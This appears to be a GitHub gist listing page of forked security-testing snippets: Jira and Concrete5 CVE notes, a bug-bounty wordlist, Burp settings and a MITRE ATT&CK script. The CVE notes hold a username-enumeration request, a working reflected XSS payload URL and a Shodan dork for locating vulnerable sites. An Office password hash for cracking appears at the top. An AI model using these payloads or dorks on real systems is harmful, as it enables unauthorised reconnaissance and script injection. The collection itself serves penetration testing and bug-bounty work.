Skip to content

Instantly share code, notes, and snippets.

secret.docx:$office$*2013*100000*256*16*744b3976099db961c0b732b3cf844f6b*316c99e8ab8e5b972714d9e8f289f808*09b4dcc218db1d0590a9609ffeb3d1e08bcc10dca254a958b40b018d07ac5670
@abramas
abramas / Jira bug-exploit
Created April 4, 2022 11:48 — forked from 0x240x23elu/Jira bug-exploit
Jira Bug CVE-2019-8449,CVE-2019-8451,CVE-2019-8451,cve-2018-20824,cve-2020-14179,cve-2020-14181,CVE-2018-5230
cve-2019-8449
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
https://jira.atlassian.com/browse/JRASERVER-69796
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
=====================================================================================================================================
Concrete5 CMS XSS vulnerability tweet by Jackson
Shodan Dork : 'Set-Cookie: CONCRETE5'
Vulnerable URL :
https://IP:PORT/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><img/src/onerror=.1|alert(document.domain)>
By using below URL we can download the results. ( Shodan Premium API Key is needed )
shodan download concrete5 'Set-Cookie: CONCRETE5'
https://01-asea.apac.prd.audience.teams.microsoft.com
https://01-auea.apac.prd.audience.teams.microsoft.com
https://01-euno.emea.prd.audience.teams.microsoft.com
https://01-euwe.emea.prd.audience.teams.microsoft.com
https://01-usce.noam.prd.audience.teams.microsoft.com
https://01-usea.noam.prd.audience.teams.microsoft.com
https://01-ussc.noam.prd.audience.teams.microsoft.com
https://01-uswe.noam.prd.audience.teams.microsoft.com
https://02-asea.apac.prd.audience.teams.microsoft.com
https://02-auea.apac.prd.audience.teams.microsoft.com
@abramas
abramas / wordlist.txt
Created May 19, 2020 15:27 — forked from random-robbie/wordlist.txt
bruteforce wordlist for bug bountys
This file has been truncated, but you can view the full file.
20-ev-allgemein
20-years
200
2000
20000719
2001
2001cc
2002
2003
2004
@abramas
abramas / burpsettings.json
Created December 21, 2019 01:24 — forked from jgamblin/burpsettings.json
Burp Settings JSON
{
"project_options":{
"connections":{
"hostname_resolution":[],
"out_of_scope_requests":{
"drop_all_out_of_scope":false,
"exclude":[
{
"enabled":true,
"file":"logout",
@abramas
abramas / attack-to-csv.py
Created May 15, 2019 13:21 — forked from vysecurity/attack-to-csv.py
Get MITRE ATT&CK Framework Techniques by Group in CSV
from stix2 import FileSystemSource
from stix2 import Filter
from stix2.utils import get_type_from_id
fs = FileSystemSource('./enterprise-attack')
def get_group_by_alias(src):
return src.query([
Filter('type', '=', 'intrusion-set'),
])